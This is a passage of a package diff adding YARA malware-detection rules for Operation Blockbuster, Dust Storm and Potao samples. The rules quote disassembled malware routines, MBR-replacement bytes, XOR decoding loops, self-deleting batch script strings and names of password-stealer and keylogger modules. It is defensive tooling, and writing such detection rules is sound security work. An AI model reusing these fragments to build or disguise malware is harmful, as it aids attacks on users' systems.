+	*/
+
+	$apiLoader = { E8 [4] 8B [3] 8B ?? 5? E8 [4] 83 C4 08 85 ?? 74 ?? 85 C0 74 ?? 5? FF 15 [4] 5? 8B ?? E8 [4] 83 C4 04 5? 5? FF 15 }
+
+	/*
+		68 B8 0B 00 00           push    0BB8h           ; dwMilliseconds
+		FF 15 18 10 02 10        call    ds:Sleep
+		6A 01                    push    1               ; dwTimeout
+		8D 4C 24 10              lea     ecx, [esp+4C0h+peerEntries]
+		68 B0 04 00 00           push    4B0h            ; dwBytesToRead
+		51                       push    ecx             ; pvRecvBuffer
+		8B CE                    mov     ecx, esi        ; this
+		C7 44 24 14 B0 04 00 00  mov     [esp+4C8h+Memory], 4B0h
+		E8 25 F4 FF FF           call    CClientConnection__RecvData
+		83 F8 FF                 cmp     eax, 0FFFFFFFFh
+	*/
+
+	$recvPeers = { 68 B8 0B 00 00 FF 15 [4] 6A 01 [0-4] 68 B0 04 00 00 51 8B ?? [1-4] B0 04 00 00 E8 [4] 83 F8 FF	}		
+		
+	$logFileName = "KBD_%%s_%%02d%%02d%%02d%%02d%%02d.CAT"
+	
+	condition:
+		$recvFunc in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+		or $apiLoader in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+		or $recvPeers in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+		or $logFileName
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/suicidescripts.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/suicidescripts.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/suicidescripts.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/suicidescripts.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,42 @@
+// yara sigs for detecting common suicide scripts
+
+rule SuicideScriptL1
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+
+	strings:
+		$ = ":L1\ndel \"%s\"\nif exist \"%s\" goto L1\ndel \"%s\"\n"
+	condition:
+		any of them
+}
+
+rule SuicideScriptR1_Multi
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+	
+	strings:
+		$ = "\" goto R1\ndel /a \""
+		$ = "\"\nif exist \""
+		$ = "@echo off\n:R1\ndel /a \""
+	condition:
+		all of them
+}
+
+rule SuicideScriptR
+{
+	// joanap, joanapCleaner
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+
+	strings:
+		$ = ":R\nIF NOT EXIST %s GOTO E\ndel /a %s\nGOTO R\n:E\ndel /a d.bat"
+		
+	condition:
+		all of them
+
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/TangoAlfa.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/TangoAlfa.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/TangoAlfa.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/TangoAlfa.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,19 @@
+rule TangoAlfa
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+
+	strings:
+		// $firewall is a shared code string
+		$firewall = "%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing T%s %d \"%s\""
+		
+		$testStatus1 = "*****[Start Test -> %s:%d]" wide
+		$testStatus2 = "*****[Relay Connect " wide
+		$testStatus3 = "*****[Listen Port %d] - " wide
+		$testStatus4 = "*****[Error Socket]" wide
+		$testStatus5 = "*****[End Test]" wide
+
+	condition:
+		2 of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/TangoBravo.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/TangoBravo.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/TangoBravo.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/TangoBravo.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,30 @@
+import "pe"
+
+rule TangoBravo
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "2aa9cd3a2db2bd9dbe5ee36d9a5fc42b50beca806f9d644f387d5a680a580896"
+
+	strings:
+	/*
+		50                 push    eax             ; SubStr
+		55                 push    ebp             ; Str
+		FF D3              call    ebx ; strstr
+		83 C4 08           add     esp, 8
+		85 C0              test    eax, eax
+		75 1A              jnz     short loc_401131
+		8A 8E 08 01 00 00  mov     cl, [esi+108h]
+		81 C6 08 01 00 00  add     esi, 108h
+		47                 inc     edi
+		8B C6              mov     eax, esi
+		84 C9              test    cl, cl
+		75 E2              jnz     short loc_40110C
+	*/
+
+	$targetDomainCheck = {5? 5? FF ?? 83 C4 08 85 C0 75 ?? 8? ?? 08 01 00 00 8? ?? 08 01 00 00 4? 8B ?? 84 ?? 75  }
+
+	condition:
+		$targetDomainCheck in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/UniformAlfa.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/UniformAlfa.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/UniformAlfa.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/UniformAlfa.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,27 @@
+import "pe"
+
+rule UniformAlfa
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "a24377681cf56c712e544af01ac8a5dbaa81d16851a17a147bbf5132890d7437"
+
+	strings:
+	/*
+		8D 44 24 10        lea     eax, [esp+2Ch+ServiceStatus]
+		50                 push    eax             ; lpServiceStatus
+		6A 01              push    1               ; dwControl
+		56                 push    esi             ; hService
+		FF D3              call    ebx ; ControlService
+		83 7C 24 14 01     cmp     [esp+2Ch+ServiceStatus.dwCurrentState], 1
+		75 EF              jnz     short loc_4010A5
+		56                 push    esi             ; hService
+		FF 15 08 70 40 00  call    ds:DeleteService
+	*/
+
+	$stopDeleteService = {8D [3] 5? 6A 01 5? FF D?	83 [3] 01 75 ?? 5? FF 15}
+
+	condition:
+		$stopDeleteService in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/UniformJuliett.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/UniformJuliett.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/UniformJuliett.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/UniformJuliett.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,29 @@
+rule UniformJuliett
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "Cmd03000_1a6f62e1630d512c3b67bfdbff26270177585c82802ffa834b768ff47be0a008.bin"
+
+	strings:
+		/*
+			56                 push    esi             ; hSCObject
+			FF D5              call    ebp ; CloseServiceHandle
+			68 B8 0B 00 00     push    0BB8h           ; dwMilliseconds
+			FF 15 38 70 40 00  call    ds:Sleep
+			6A 00              push    0               ; fCreateHighestLevel
+			68 60 A9 40 00     push    offset PathName ; lpPathName
+			E8 43 FE FF FF     call    RecursivelyCreateDirectories
+			83 C4 08           add     esp, 8
+			68 60 A9 40 00     push    offset PathName ; lpFileName
+			FF 15 3C 70 40 00  call    ds:DeleteFileA
+		*/
+		
+		$a = {56 FF D5 68 B8 0B 00 00 FF 15 [4] 6A 00 68 [4] E8 [4] 83 C4 08 68 [4] FF 15}
+		
+		$ = "wauserv.dll"
+		$ = "Rpcss"
+	
+	condition:
+		all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/WhiskeyAlfa.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/WhiskeyAlfa.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/WhiskeyAlfa.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/WhiskeyAlfa.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,49 @@
+import "pe"
+
+rule WhiskeyAlfa
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "1c66e67a8531e3ff1c64ae57e6edfde7bef2352d.ex_"
+
+	strings:
+	/*
+		E8 77 07 00 00     call    _rand
+		B1 FB              mov     cl, 0FBh
+		F6 E9              imul    cl
+		88 44 34 08        mov     [esp+esi+10008h+randomData], al
+		46                 inc     esi
+		81 FE 00 00 01 00  cmp     esi, 10000h
+		7C EA              jl      short loc_402E8D
+	*/
+
+	$randomBuffer = {E8 [4] B1 ?? F6 E9 88 [3] 4? 81 ?? 00 00 01 00 7C}
+
+	/*
+		89 58 09              mov     [eax+9], ebx
+		C7 40 65 00 00 02 00  mov     dword ptr [eax+65h], 20000h
+		C7 40 15 04 00 00 00  mov     dword ptr [eax+15h], 4
+		C6 40 08 08           mov     byte ptr [eax+8], 8
+		C7 40 04 00 02 00 00  mov     dword ptr [eax+4], 200h
+		89 18                 mov     [eax], ebx
+		89 58 0D              mov     [eax+0Dh], ebx
+		C7 40 11 01 00 00 00  mov     dword ptr [eax+11h], 1
+		89 58 69              mov     [eax+69h], ebx
+		89 58 19              mov     [eax+19h], ebx
+		B8 01 00 00 00        mov     eax, 1
+	*/
+	$mbrDiskInfo = {89 ?? 09 C7 ?? 65 00 00 02 00 C7 ?? 15 04 00 00 00 C6 ?? 08 08 C7 ?? 04 00 02 00 00 89 ?? 89 ?? 0D C7 ?? 11 01 00 00 00 89 ?? 69 89 ?? 19 B8 01 00 00 00}
+		
+
+		// the replacement MBRs in both encoded (XOR 0x53) and decoded form		
+		$mbrReplacement_Decoded = { B4 43 B0 00 CD 13 FE C2 80 FA 84 7C F3 B2 80 BF 65 7C 81 05 00 04 83 55 02 00 83 55 04 00 }
+		$mbrReplacement_Encoded = { E7 10 E3 53 9E 40 AD 91 D3 A9 D7 2F A0 E1 D3 EC 36 2F D2 56 53 57 D0 06 51 53 D0 06 57 53 }
+	
+		$licKey = "99E2428CCA4309C68AAF8C616EF3306582A64513E55C786A864BC83DAFE0C78585B692047273B0E55275102C664C5217E76B8E67F35FCE385E4328EE1AD139EA6AA26345C4F93000DBBC7EF1579D4F"
+		
+	condition:
+		$licKey or $mbrReplacement_Decoded or $mbrReplacement_Encoded
+		or $randomBuffer in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+		or $mbrDiskInfo in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/WhiskeyBravo_mod.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/WhiskeyBravo_mod.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/WhiskeyBravo_mod.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/WhiskeyBravo_mod.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,52 @@
+// This rule has been modified by @mmorenog @yararules to fix some syntax errors, it's not the original rule
+
+import "pe"
+
+rule WhiskeyBravo
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "74eac0461c40316689ac2d598f606caa3965195b22f23d5acefeedfcdf056c5b"
+		Source = "41badf10ef6f469dd1c3be201aba809f9c42f86ad77d7f83bc3895bfa289c635"
+		Source = "d079a266ed2a852c33cdac3df115d163ebbf2c8dae32d935e895cf8193163b13"
+
+	strings:
+	/*
+		6A 04              push    4               ; MaxCount  <--- this arg is not found in some variants (41bad..) as wcscmp is used instead
+		68 08 82 00 10     push    offset Str2     ; ".doc"
+		56                 push    esi             ; Str1
+		FF D7              call    edi ; _wcsnicmp            <--- d07... variant uses a direct call instead
+		83 C4 0C           add     esp, 0Ch										<--- when wcscmp is used, this is add esp, 8
+		85 C0              test    eax, eax
+		0F 84 5B 02 00 00  jz      loc_100017D5
+		6A 05              push    5               ; MaxCount
+		68 FC 81 00 10     push    offset a_docx   ; ".docx"
+		56                 push    esi             ; Str1
+		FF D7              call    edi ; _wcsnicmp
+		83 C4 0C           add     esp, 0Ch
+		85 C0              test    eax, eax
+		0F 84 46 02 00 00  jz      loc_100017D5
+		6A 04              push    4               ; MaxCount
+		68 F0 81 00 10     push    offset a_docm   ; ".docm"
+		56                 push    esi             ; Str1
+		FF D7              call    edi ; _wcsnicmp
+		83 C4 0C           add     esp, 0Ch
+		85 C0              test    eax, eax
+		0F 84 31 02 00 00  jz      loc_100017D5
+		6A 04              push    4               ; MaxCount
+		68 E4 81 00 10     push    offset a_wpd    ; ".wpd"
+		56                 push    esi             ; Str1
+		FF D7              call    edi ; _wcsnicmp
+	*/
+
+	$a = {68 [4] 5? FF D? 83 C4 0C 85 C0 0F 84 [4] [0-2] 68 [4] 5? FF D? 83 C4 0C 85 C0 0F 84 [4] [0-2] 68 [4] 5? FF D? 83 C4 0C 85 C0 0F 84 }
+
+	$ext1 = ".wpd" wide nocase
+	$ext2 = ".doc" wide nocase
+	$ext3 = ".hwp" wide nocase
+	
+	condition:
+		2 of ($ext*) and $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
+
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/WhiskeyCharlie.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/WhiskeyCharlie.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/WhiskeyCharlie.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/WhiskeyCharlie.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,50 @@
+import "pe"
+
+rule WhiskeyCharlie
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
+		Source = "47ff4f73738acc2f8433dccb2caf980d7444d723ccf2968d69f88f8f96405f96"
+
+	strings:
+	/*
+		66 89 55 DC     mov     [ebp+SystemTime.wYear], dx
+		E8 1E 16 00 00  call    _rand
+		6A 0C           push    0Ch
+		99              cdq
+		59              pop     ecx
+		F7 F9           idiv    ecx
+		42              inc     edx
+		66 89 55 DE     mov     [ebp+SystemTime.wMonth], dx
+		E8 0E 16 00 00  call    _rand
+		6A 1C           push    1Ch
+		99              cdq
+		59              pop     ecx
+		F7 F9           idiv    ecx
+		42              inc     edx
+		66 89 55 E2     mov     [ebp+SystemTime.wDay], dx
+		E8 FE 15 00 00  call    _rand
+		6A 18           push    18h
+		99              cdq
+		59              pop     ecx
+		F7 F9           idiv    ecx
+		66 89 55 E4     mov     [ebp+SystemTime.wHour], dx
+		E8 EF 15 00 00  call    _rand
+		6A 3C           push    3Ch
+		99              cdq
+		59              pop     ecx
+		F7 F9           idiv    ecx
+		66 89 55 E6     mov     [ebp+SystemTime.wMinute], dx
+		E8 E0 15 00 00  call    _rand
+		6A 3C           push    3Ch
+		99              cdq
+		59              pop     ecx
+		F7 F9           idiv    ecx
+	*/
+
+	$a = {66 89 55 DC E8 [4] 6A 0C 	99 59 F7 F9 42 66 89 55 DE E8 [4] 6A 1C 99 59 F7 F9 42 66 89 55 E2 E8 [4] 6A 18 99 59 F7 F9 66 89 55 E4 E8 [4] 6A 3C 99 59 F7 F9 66 89 55 E6 E8 [4] 6A 3C 99 59 F7 F9 }
+
+	condition:
+		$a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/WhiskeyDelta.yara remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/WhiskeyDelta.yara
--- remnux-rules-0.0.3/yara/malware/Operation_Blockbuster/WhiskeyDelta.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Blockbuster/WhiskeyDelta.yara	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,45 @@
+import "pe"
+
+rule WhiskeyDelta
+{
+	meta:
+		copyright = "2015 Novetta Solutions"
+		author = "Novetta Threat Research & Interdiction Group  trig@novetta.com"
+		Source = "41badf10ef6f469dd1c3be201aba809f9c42f86ad77d7f83bc3895bfa289c635"
+
+	strings:
+	/*
+		F3 A5           rep movsd
+		8B 7C 24 30     mov     edi, [esp+28h+arg_4]
+		85 FF           test    edi, edi
+		7E 3A           jle     short loc_402018
+		8B 74 24 2C     mov     esi, [esp+28h+arg_0]
+		8A 44 24 08     mov     al, [esp+28h+var_20]
+		53              push    ebx
+		8A 4C 24 21     mov     cl, [esp+2Ch+var_B]
+		8A 5C 24 2B     mov     bl, [esp+2Ch+var_1]
+		32 C1           xor     al, cl
+		8A 0C 32        mov     cl, [edx+esi]
+		32 C3           xor     al, bl
+		32 C8           xor     cl, al
+		88 0C 32        mov     [edx+esi], cl
+		B9 1E 00 00 00  mov     ecx, 1Eh
+		8A 5C 0C 0C     mov     bl, [esp+ecx+2Ch+var_20]
+		88 5C 0C 0D     mov     [esp+ecx+2Ch+var_1F], bl
+		49              dec     ecx
+		83 F9 FF        cmp     ecx, 0FFFFFFFFh
+		7F F2           jg      short loc_402000
+		42              inc     edx
+	*/
+
+	$decryption = {F3 A5 8B 7C 24 30 85 FF 7E ?? 8B 74 24 2C 8A 44 24 08 53 8A 4C 24 21 8A 5C 24 2B 32 C1 8A 0C 32 32 C3 32 C8 88 0C 32 B9 1E 00 00 00 8A 5C 0C 0C 	88 5C 0C 0D 49 	83 F9 FF 7F ?? 	42 }
+
+	$s1 = "=====IsFile=====" wide
+	$s2 = "=====4M=====" wide
+	$s3 = "=====IsBackup=====" wide
+	
+	condition:
+		2 of ($s*) 
+		or $decryption in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
+}
+
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Dust_storm.yar remnux-rules-0.0.4/yara/malware/Operation_Dust_storm.yar
--- remnux-rules-0.0.3/yara/malware/Operation_Dust_storm.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Dust_storm.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,142 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule Misdat_Backdoor_Packed
+{
+	meta:
+		author = "Cylance SPEAR Team"
+		note = "Probably Prone to False Positive"
+
+	strings:
+		$upx = {33 2E 30 33 00 55 50 58 21}
+		$send = {00 00 00 73 65 6E 64 00 00 00}
+		$delphi_sec_pe = {50 45 00 00 4C 01 03 00 19 5E 42 2A}
+		$shellexec = {00 00 00 53 68 65 6C 6C 45 78 65 63 75 74 65 57 00 00 00}
+		
+	condition:
+		filesize < 100KB and $upx and $send and $delphi_sec_pe and $shellexec
+}
+
+rule MiSType_Backdoor_Packed
+{
+	meta:
+		author = "Cylance SPEAR Team"
+		note = "Probably Prone to False Positive"
+
+	strings:
+		$upx = {33 2E 30 33 00 55 50 58 21}
+		$send_httpquery = {00 00 00 48 74 74 70 51 75 65 72 79 49 6E 66 6F 41 00 00 73 65 6E 64 00 00}
+		$delphi_sec_pe = {50 45 00 00 4C 01 03 00 19 5E 42 2A}
+	
+	condition:
+		filesize < 100KB and $upx and $send_httpquery and $delphi_sec_pe
+}
+
+rule Misdat_Backdoor
+{
+	meta:
+		author = "Cylance SPEAR Team"
+		/* Decode Function
+		CODE:00406C71 8B 55 F4					mov     edx, [ebp+var_C]
+		CODE:00406C74 8A 54 1A FF				mov     dl, [edx+ebx-1]
+		CODE:00406C78 8B 4D F8					mov     ecx, [ebp+var_8]
+		CODE:00406C7B C1 E9 08 					shr     ecx, 8
+		CODE:00406C7E 32 D1						xor     dl, cl
+		CODE:00406C80 88 54 18 FF				mov     [eax+ebx-1], dl
+		CODE:00406C84 8B 45 F4					mov     eax, [ebp+var_C]
+		CODE:00406C87 0F B6 44 18 FF			movzx   eax, byte ptr [eax+ebx-1]
+		CODE:00406C8C 03 45 F8					add     eax, [ebp+var_8]
+		CODE:00406C8F 69 C0 D9 DB 00 00  		imul    eax, 0DBD9h
+		CODE:00406C95 05 3B DA 00 00 			add     eax, 0DA3Bh
+		CODE:00406C9A 89 45 F8 					mov     [ebp+var_8], eax
+		CODE:00406C9D 43 						inc     ebx
+		CODE:00406C9E 4E 						dec     esi
+		CODE:00406C9F 75 C9 					jnz     short loc_406C6A
+		*/
+	strings:
+		$imul = {03 45 F8 69 C0 D9 DB 00 00 05 3B DA 00 00}
+		$delphi = {50 45 00 00 4C 01 08 00 19 5E 42 2A}
+		
+	condition:
+		$imul and $delphi
+}
+
+rule SType_Backdoor
+{
+	meta:
+		author = "Cylance SPEAR Team"
+		
+		/* Decode Function
+		8B 1A		mov     ebx, [edx]
+		8A 1B		mov     bl, [ebx]
+		80 EB 02	sub     bl, 2
+		8B 74 24 08 mov     esi, [esp+14h+var_C]
+		32 1E		xor     bl, [esi]
+		8B 31		mov     esi, [ecx]
+		88 1E		mov     [esi], bl
+		8B 1A		mov     ebx, [edx]
+		43			inc     ebx
+		89 1A		mov     [edx], ebx
+		8B 19		mov     ebx, [ecx]
+		43			inc     ebx
+		89 19		mov     [ecx], ebx
+		48			dec     eax
+		75 E2		jnz     short loc_40EAC6
+		*/
+
+	strings:
+		$stype = "stype=info&data="
+		$mmid = "?mmid="
+		$status = "&status=run succeed"
+		$mutex = "_KB10B2D1_CIlFD2C"
+		$decode = {8B 1A 8A 1B 80 EB 02 8B 74 24 08 32 1E 8B 31 88 1E 8B 1A 43}
+	
+	condition:
+		$stype or ($mmid and $status) or $mutex or $decode
+}
+
+rule Zlib_Backdoor
+{
+	meta:
+		author = "Cylance SPEAR Team"
+		
+		/* String
+		C7 45 FC 00 04 00 00    	  mov     [ebp+Memory], 400h
+		C6 45 D8 50                   mov     [ebp+Str], 'P'
+		C6 45 D9 72                   mov     [ebp+var_27], 'r'
+		C6 45 DA 6F                   mov     [ebp+var_26], 'o'
+		C6 45 DB 78                   mov     [ebp+var_25], 'x'
+		C6 45 DC 79                   mov     [ebp+var_24], 'y'
+		C6 45 DD 2D                   mov     [ebp+var_23], '-'
+		C6 45 DE 41                   mov     [ebp+var_22], 'A'
+		C6 45 DF 75                   mov     [ebp+var_21], 'u'
+		C6 45 E0 74                   mov     [ebp+var_20], 't'
+		C6 45 E1 68                   mov     [ebp+var_1F], 'h'
+		C6 45 E2 65                   mov     [ebp+var_1E], 'e'
+		C6 45 E3 6E                   mov     [ebp+var_1D], 'n'
+		C6 45 E4 74                   mov     [ebp+var_1C], 't'
+		C6 45 E5 69                   mov     [ebp+var_1B], 'i'
+		C6 45 E6 63                   mov     [ebp+var_1A], 'c'
+		C6 45 E7 61                   mov     [ebp+var_19], 'a'
+		C6 45 E8 74                   mov     [ebp+var_18], 't'
+		C6 45 E9 65                   mov     [ebp+var_17], 'e'
+		C6 45 EA 3A                   mov     [ebp+var_16], ':'
+		C6 45 EB 20                   mov     [ebp+var_15], ' '
+		C6 45 EC 4E                   mov     [ebp+var_14], 'N'
+		C6 45 ED 54                   mov     [ebp+var_13], 'T'
+		C6 45 EE 4C                   mov     [ebp+var_12], 'L'
+		C6 45 EF 4D                   mov     [ebp+var_11], 'M'
+		C6 45 F0 20                   mov     [ebp+var_10], ' '
+		*/
+
+
+	strings:
+		$auth = {C6 45 D8 50 C6 45 D9 72 C6 45 DA 6F C6 45 DB 78 C6 45 DC 79 C6 45 DD 2D}
+		$auth2 = {C7 45 FC 00 04 00 00 C6 45 ?? 50 C6 45 ?? 72 C6 45 ?? 6F}
+		$ntlm = "NTLM" wide
+	
+	condition:
+		($auth or $auth2) and $ntlm
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Operation_Potao.yar remnux-rules-0.0.4/yara/malware/Operation_Potao.yar
--- remnux-rules-0.0.3/yara/malware/Operation_Potao.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Operation_Potao.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,112 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+// Operation Potao yara rules
+// For feedback or questions contact us at: github@eset.com
+// https://github.com/eset/malware-ioc/
+//
+// These yara rules are provided to the community under the two-clause BSD
+// license as follows:
+//
+// Copyright (c) 2015, ESET
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions are met:
+//
+// 1. Redistributions of source code must retain the above copyright notice, this
+// list of conditions and the following disclaimer.
+//
+// 2. Redistributions in binary form must reproduce the above copyright notice,
+// this list of conditions and the following disclaimer in the documentation
+// and/or other materials provided with the distribution.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+// DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+// FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+// DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+// CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+// OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+//
+private rule PotaoDecoy
+{
+    strings:
+        $mz = { 4d 5a }
+        $str1 = "eroqw11"
+        $str2 = "2sfsdf"
+        $str3 = "RtlDecompressBuffer"
+        $wiki_str = "spanned more than 100 years and ruined three consecutive" wide
+
+        $old_ver1 = {53 68 65 6C 6C 33 32 2E 64 6C 6C 00 64 61 66 73 72 00 00 00 64 61 66 73 72 00 00 00 64 6F 63 (00 | 78)}
+        $old_ver2 = {6F 70 65 6E 00 00 00 00 64 6F 63 00 64 61 66 73 72 00 00 00 53 68 65 6C 6C 33 32 2E 64 6C 6C 00}       
+    condition:
+        ($mz at 0) and ( (all of ($str*)) or any of ($old_ver*) or $wiki_str )
+}
+private rule PotaoDll
+{
+    strings:
+        $mz = { 4d 5a }
+        
+        $dllstr1 = "?AVCncBuffer@@"
+        $dllstr2 = "?AVCncRequest@@"
+        $dllstr3 = "Petrozavodskaya, 11, 9"
+        $dllstr4 = "_Scan@0"
+        $dllstr5 = "\x00/sync/document/"
+        $dllstr6 = "\\temp.temp"
+        
+        $dllname1 = "node69MainModule.dll"
+        $dllname2 = "node69-main.dll"
+        $dllname3 = "node69MainModuleD.dll"
+        $dllname4 = "task-diskscanner.dll"
+        $dllname5 = "\x00Screen.dll"
+        $dllname6 = "Poker2.dll"        
+        $dllname7 = "PasswordStealer.dll"
+        $dllname8 = "KeyLog2Runner.dll" 
+        $dllname9 = "GetAllSystemInfo.dll"          
+        $dllname10 = "FilePathStealer.dll"          
+    condition:
+        ($mz at 0) and (any of ($dllstr*) and any of ($dllname*))
+}
+private rule PotaoUSB
+{
+    strings:
+        $mz = { 4d 5a }
+        
+        $binary1 = { 33 C0 8B C8 83 E1 03 BA ?? ?? ?? 00 2B D1 8A 0A 32 88 ?? ?? ?? 00 2A C8 FE C9 88 88 ?? ?? ?? 00 40 3D ?? ?? 00 00 7C DA C3 }
